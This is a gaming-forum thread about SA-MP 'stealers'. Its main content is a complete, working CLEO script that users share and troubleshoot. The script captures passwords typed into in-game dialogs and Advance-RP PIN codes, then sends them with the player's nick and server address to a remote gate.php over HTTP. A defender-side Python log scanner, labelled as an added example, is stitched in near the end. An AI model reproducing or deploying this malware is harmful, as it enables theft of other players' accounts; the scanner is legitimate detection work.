SAMP Stealer

inZ

Well-known member
Joined
Apr 6, 2013
Messages
270
Reaction score
1
Can you guys explain what it actually does? :dont_care:
 
Joined
Feb 18, 2005
Messages
2,965
Reaction score
271
inZ link said:
Can you guys explain what it actually does? :dont_care:

When you join an RP server (stealers are mostly made for these servers), a dialog shows up that requires you to type your account password. Once typed, CLEO sends your NAME/SERVER-IP/PASSWORD to an FTP, and now some people have your sa:mp account password.
 

TheZeRots

Expert
Joined
Dec 21, 2013
Messages
1,247
Reaction score
1
It's a SAMP keylogger.
When SAMP launches gta_sa.exe, that launches ASI loader, which launches CLEO.asi, CLEO.asi loads all .cs files including the keylogger hidden in a CLEO script.
The keylogger records in-game keystrokes and/or text typed in the dialog boxes, gets your name and server address, and sends that to FTP OR makes an HTML file, sends it to FTP then deletes the file.

However, in the scripts I've seen, aren't there too few arguments; you need server address, username, password and folder at least...?
 

esmer_gm

Active member
Joined
Apr 9, 2013
Messages
135
Reaction score
0
Mr.Ze link said:
esmer_gm link said:
I'm asking just how to put add.php, I have source and can't connect cleo and add.php

Google that :p

I'm trying like 5 days, every fucking time it's same, whole google checked
 

inZ

Well-known member
Joined
Apr 6, 2013
Messages
270
Reaction score
1
ok thanks guys for explaining
"Whole google checked" hahahahaha this sentence made my day it takes year to check whole google  :angry:
 

Harlem

Well-known member
Joined
Apr 2, 2013
Messages
237
Reaction score
0
Bumping an old thread, but I'm interested in this. I get an error when using "key 30@"; same shit if I replace it with "0AB0: 30@", it gives me the same error. Any ideas? :motherofgod_
 
Joined
Feb 18, 2005
Messages
2,965
Reaction score
271
What error?
Also there are probably more 'key @' to replace with 0AB0.
 

esmer_gm

Active member
Joined
Apr 9, 2013
Messages
135
Reaction score
0
This code is not working, I have one which I am using 2 months, works perfectly
 

Harlem

Well-known member
Joined
Apr 2, 2013
Messages
237
Reaction score
0
esmer_gm link said:
This code is not working, I have one which I am using 2 months, works perfectly

Can you provide me with the code? thanks.

springfield link said:
What error?
Also there are probably more 'key @' to replace with 0AB0.

I get a directive error when using "key @" and the same stuff with 0AB0 when there are no more lines with it, mmmm.
 

Harlem

Well-known member
Joined
Apr 2, 2013
Messages
237
Reaction score
0
If someone is still interested in this topic, I found a working one for 0.3z

Code:
{$CLEO}

0000: T.G

const
    URL = "yourURL"
    ADD_URL = "gate.php"
end
call @create_new_thread 1 @Stealer // Create new thread(stealer)
32@ = 0
33@ = 0

repeat 
    wait 400
until 0AFA: is_samp_structures_available

:Main
while true
    wait 0
// MAIN CODE 
if 
33@ = SAMP.Base()
else_jump @miner_83 // 
0A93: end_custom_thread 

:miner_83 //
end

:Stealer
const
    // SAMP Dialog Styles
    DIALOG_STYLE_MSGBOX = 0
    DIALOG_STYLE_INPUT = 1
    DIALOG_STYLE_LIST = 2
    DIALOG_STYLE_PASSWORD = 3
    
    GAMESTATE_CONNECTED = 3
    
    aData = 1@
    size_aData = 2048
    buf = 2@
    format_string = 3@
    
    library_point = 5@
    
    aData_dlgid = 0
    aData_nick = 1
    aData_ip = 2
    aData_sname = 3
    aData_dlgtext = 4
    aData_pincode = 5
end

repeat
    wait 100
until 0AA2: library_point = load_library "wininet.dll"

while true
    wait 0
    0@ = SAMP.GetGamestate()
    if 0@ == GAMESTATE_CONNECTED
    jf continue

    gosub @steal_arp_pincodes // 

    if Samp.IsDialogActive(-1)
    jf continue

    0@ = Samp.GetDialogType()
    if or
        0@ == DIALOG_STYLE_INPUT
        0@ == DIALOG_STYLE_PASSWORD
    jf continue

    alloc aData size_aData
    alloc buf 128
    alloc format_string 257
    0c11: memset aData 0 size_aData
    0c11: memset buf 0 128
    0c11: memset format_string 0 257

    while Samp.IsDialogActive(-1)
        wait 0
        // ---- WRITE DIALOG ID TO ARRAY
        0@ = Samp.GetDialogID()
        format format_string = "%d" 0@   
        0C20: string_array aData element aData_dlgid size 128 = format_string
        // --------------------------------------------------

        // GENERAL INFO: NICK, IP, SERVER NAME
        call @WriteGeneralInfo 3 data aData buf format_string

        // ---- STEAL
        0c11: memset buf 0 128
        while SAMP.IsDialogActive(-1)
            wait 0
            buf = SAMP.GetDialogInputBoxText()
        end
        0C20: string_array aData element aData_dlgtext size 128 = buf 
        // --------------------------------------------------

        wait 0 // %

        0c11: memset format_string 0 257 // clear string
        0085: 4@ = format_string // get start pointer of string
        
        // ---- PREPARING SENDING DATA TO A URL
        call @PreparingGeneralInfo 2 aData format_string ret_to format_string
        
        0C1F: 8@ = string_array aData element aData_dlgid size 128
        format format_string = "&dialog=%s" 8@
        0c17: strlen 8@ format_string
        005a: format_string += 8@
        
        0C1F: 8@ = string_array aData element aData_dlgtext size 128
        call @converter_russian_sym 1 string 8@ to 9@    
        format format_string = "&input=%s" 9@
        free 9@
        // --------------------------------------------------

        0085: format_string = 4@ // GO TO START OF STRING
        
        // ---- SEND DATA TO A URL
        call @SendData 2 str format_string lib library_point
        // --------------------------------------------------
    end
    
    free aData
    free buf
    free format_string  
    4@ = 0  
end

:steal_arp_pincodes
// ADVANCE-RP | STEAL PIN-CODE
0@ = SAMP.Base()
0@ += 0x212A80
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0
0@ += 985
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0

0A8D: 6@ = read_memory 0@ size 4 virtual_protect 0
6@ += 9216

0A90: 7@ = 2048 * 4
005a: 7@ += 6@
0A8D: 7@ = read_memory 7@ size 4 virtual_protect 0
if 7@ > 0
then
    alloc aData size_aData
    alloc buf 128
    alloc format_string 257
    0c11: memset aData 0 size_aData
    0c11: memset buf 0 128
    0c11: memset format_string 0 257
    0085: 4@ = format_string

    12@ = 0
    while true
        wait 0
        for 8@ = 2048 to 2057
            0A90: 7@ = 8@ * 4
            005a: 7@ += 6@
            0A8D: 9@ = read_memory 7@ size 4 virtual_protect 0
            if 9@ > 0
            then
                10@ = 416.0
                11@ = 168.0
    
/*
SIZE BLOCK = 30x30 px.
EMPTY SPACE = 10 px.
----------------------
| 2048 | 2049 | 2050 |
| 2051 | 2052 | 2053 |
| 2054 | 2055 | 2056 |
|      | 2057 |      |
----------------------
*/
    
                if or
                    8@ == 2049
                    8@ == 2052
                    8@ == 2055
                    8@ == 2057
                then 10@ += 40.0
                end
                if or
                    8@ == 2050
                    8@ == 2053
                    8@ == 2056
                then 10@ += 80.0
                end
    
                if 8@ >= 2051
                then
                    11@ += 40.0
                    if 8@ >= 2054
                    then 
                        11@ += 40.0
                        if 8@ == 2057
                        then 11@ += 40.0
                        end
                    end
                end
    
                if call @is_cursor_here 4 sXY 10@ 11@ eXY 29.0 29.0
                then
                    if 0ab0: key 1
                    then
                        while 0ab0: key 1
                            wait 0 
                        end
                        if call @is_cursor_here 4 sXY 10@ 11@ eXY 29.0 29.0
                        then
                            format format_string = "%s" 9@
                            format_string++

                            12@++
                            if 12@ >= 4
                            then
                                0085: format_string = 4@
                                0C20: string_array aData element aData_pincode size 128 = format_string
                                0c11: memset format_string 0 257 // clear string
                            
                                call @WriteGeneralInfo 3 data aData buf format_string
                                0c11: memset format_string 0 257 // clear string

                                // ---- PREPARING SENDING DATA TO A URL
                                call @PreparingGeneralInfo 2 aData format_string ret_to format_string
                                
                                0C1F: 8@ = string_array aData element aData_pincode size 128   
                                format format_string = "&pincode=%s" 8@
                                0c17: strlen 8@ format_string
                                005a: format_string += 8@
                                
                                if SAMP.IsLocalPlayerSpawned()
                                then format format_string = "&spawned=1"
                                else format format_string = "&spawned=0"
                                end
                                
                                0085: format_string = 4@
                                // --------------------------------------------------
                                          
                                call @SendData 2 format_string lib library_point
                                0c11: memset format_string 0 257
                                
                                12@ = 0
                            end
                        end
                    end
                end
            end
        end
        
        if 9@ <= 0
        then break
        end
    end

    free aData
    free buf
    free format_string  
    4@ = 0  
end
// ---------------------------------------------------------------------------------
return

// ---------------------------------------------
// /////////////////////////////////////////////
// ||||||||||||||||| FUNCTIONS |||||||||||||||||
// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
// ---------------------------------------------
:WriteGeneralInfo
// ---- WRITE NICKNAME TO ARRAY
3@ = SAMP.GetSAMPPlayerIDByActorHandle($PLAYER_ACTOR)
3@ = SAMP.GetPlayerNickname(3@)
0C20: string_array 0@ element aData_nick size 128 = 3@
// --------------------------------------------------

// ---- WRITE IP:PORT TO ARRAY
SAMP.GetCurrentServerAddress(1@, 3@) 
format 2@ = "%s:%d" 1@ 3@   
0C20: string_array 0@ element aData_ip size 128 = 2@
// --------------------------------------------------

// ---- WRITE SERVER NAME TO ARRAY
1@ = SAMP.GetCurrentServerName()

0C20: string_array 0@ element aData_sname size 128 = 1@
// --------------------------------------------------
ret 0

:PreparingGeneralInfo     
0C1F: 2@ = string_array 0@ element aData_nick size 128
format 1@ = "%s?nick=%s" ADD_URL 2@
0c17: strlen 2@ 1@
005a: 1@ += 2@

0C1F: 2@ = string_array 0@ element aData_ip size 128
format 1@ = "&ip=%s" 2@
0c17: strlen 2@ 1@
005a: 1@ += 2@

0C1F: 2@ = string_array 0@ element aData_sname size 128
call @converter_russian_sym 1 string 2@ to 3@             
format 1@ = "&serv=%s" 3@
free 3@
0c17: strlen 2@ 1@
005a: 1@ += 2@
ret 1 1@

:SendData
// call @SendData 2 str 0@ lib 1@
0AA4: 31@ = get_proc_address "InternetOpenA" library 1@
0AA7: call_function 31@ num_params 5 pop 0 params 0 0 "" 0 "Google Chrome/legend edition 1.2" to 3@
if 3@ <> 0x0
then
    0AA4: 31@ = get_proc_address "InternetConnectA" library 1@
    0AA7: call_function 31@ num_params 8 pop 0 params 0 0 3 0 0 80 URL hInternet 3@ to 4@ // Preparing
    if 4@ <> 0x0
    then
        0AA4: 31@ = get_proc_address "HttpOpenRequestA" library 1@
        0AA7: call_function 31@ num_params 8 pop 0 params 0 0x80400100 "" "" "HTTP/1.1" 0@ "GET" 4@ to 5@ // Create request
        if 5@ <> 0x0
        then
            0AA4: 31@ = get_proc_address "HttpSendRequestA" library 1@
            0AA7: call_function 31@ num_params 5 pop 0 params 0 "" 62 "Content-Type: application/x-www-form-urlencoded; charset=windows-1251" 5@ to 6@ // Send
        end
    end
end

0AA4: 31@ = get_proc_address "InternetCloseHandle" library 1@
0AA7: call_function 31@ num_params 1 pop 0 params 3@ ret_to 30@
0AA7: call_function 31@ num_params 1 pop 0 params 4@ ret_to 30@
0AA7: call_function 31@ num_params 1 pop 0 params 5@ ret_to 30@
ret 0

:converter_russian_sym
const
    _string = 0@
    array_chars = 1@
    lstr = 2@
    size_nstring = 4@
    _nstring = 6@
    p_nstring = 7@
end
var
    _string : int
    lstr : int
    array_chars : int
    _nstring : int
    p_nstring : int
end
// call @converter_russian_sym 1 string 0@ to 6@
0c17: strlen lstr _string
0A90: size_nstring = lstr * 4
alloc _nstring size_nstring
0c11: memset _nstring 0 size_nstring
p_nstring = _nstring

0ac6: lo array_chars @chars
for 3@ = 0 to lstr
    0A8D: 5@ = read_memory _string size 1 virtual_protect 0
    if 5@ <> 0
    jf break

    if and
        5@ > 191
        5@ < 256
    then
        5@ -= 192
        
        0A8E: 5@ = array_chars + 5@
        0A8D: 5@ = read_memory 5@ size 1 virtual_protect 0 
    end
    
    format _nstring = "%02X" 5@

    _nstring += 2
    _string++
end
_nstring = p_nstring
ret 1 _nstring

:chars                               
hex
    C0 C1 C2 C3 C4 C5 C6 C7 C8 C9 CA CB CC CD CE CF D0 D1 D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DD DE DF E0 E1 E2 E3 E4 E5 E6 E7 E8 E9 EA EB EC ED EE EF F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF 00
end

:create_new_thread
0A9F: 32@ = current_thread_pointer
000A: 32@ += 0x10
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@
0AA7: call_function 0x464C20 num_params 1 pop 1 32@ 33@
005A: 32@ += 0@
000A: 33@ += 0x10
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
000A: 33@ += 0x2C
for 32@ = 0 to 30
    0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
    000A: 33@ += 4
end
0AB2: ret 0

:is_cursor_here
// call @is_cursor_here 4 sXY 0@ 1@ eXY 2@ 3@
0B5E: get_cursor_pos 30@ 31@
0B5F: convert_window_screen_coords 30@ 31@ to_game_screen_coords 4@ 5@
if and
    0025: 4@ > 0@
    0025: 5@ > 1@
then
    005B: 0@ += 2@
    005B: 1@ += 3@
    if and
        0025: 0@ > 4@
        0025: 1@ > 5@
    then ret 0 1
    end
end
0AB2: ret 0

I got a private folder full of this shit from kat.hosting.ru; someone released it.
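
A defender-side check for the traffic the script above generates, added here as an example (it is not code from the thread or its posters): it flags proxy-log requests that carry the script's InternetOpenA agent string or its nick/ip/serv query layout, and reports which account was exposed. The log line format, host names and sample values are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the script posted in this thread.
STEALER_UA = "Google Chrome/legend edition 1.2"      # InternetOpenA agent string
BASE_KEYS = {"nick", "ip", "serv"}                   # built by PreparingGeneralInfo
VARIANTS = {"dialog-input": {"dialog", "input"},     # dialog text capture
            "pincode": {"pincode", "spawned"}}       # Advance-RP PIN capture
HEX_RE = re.compile(r"(?:[0-9A-F]{2})+\Z")           # converter emits %02X per byte
LINE_RE = re.compile(r'(\S+) (\S+) "([^"]*)"\Z')     # assumed format: METHOD URL "UA"

def classify(line):
    """Return a finding dict for a beacon-like request, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    method, url, agent = m.groups()
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    keys = set(query)
    kind = next((k for k, v in VARIANTS.items() if v <= keys), None)
    shape = (method == "GET" and BASE_KEYS <= keys and kind is not None
             and HEX_RE.match(query["serv"][0]) is not None)
    if not shape and agent != STEALER_UA:
        return None
    finding = {"reasons": [], "kind": kind if shape else None}
    if agent == STEALER_UA:
        finding["reasons"].append("user-agent")
    if shape:
        finding["reasons"].append("query-shape")
        # Report which account was exposed; the captured secret is not extracted.
        finding["nick"] = query["nick"][0]
        finding["server"] = query["ip"][0]
        finding["server_name"] = bytes.fromhex(query["serv"][0]).decode("cp1251", "replace")
    return finding

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines: hosts, nick and field values are made up.
SAMPLE_LOG = [
    'GET http://exfil.example.invalid/gate.php?nick=Test_Player&ip=192.0.2.10:7777'
    '&serv=4D7920525020536572766572&dialog=2&input=68756E74657232 "Google Chrome/legend edition 1.2"',
    'GET http://exfil.example.invalid/gate.php?nick=Test_Player&ip=192.0.2.10:7777'
    '&serv=C0C1&pincode=1234&spawned=1 "Mozilla/5.0"',
    'GET http://forum.example.invalid/index.php?page=2&nick=abc "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any account that appears in a finding should have its password or PIN changed, since the request was sent over plain HTTP on port 80.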
 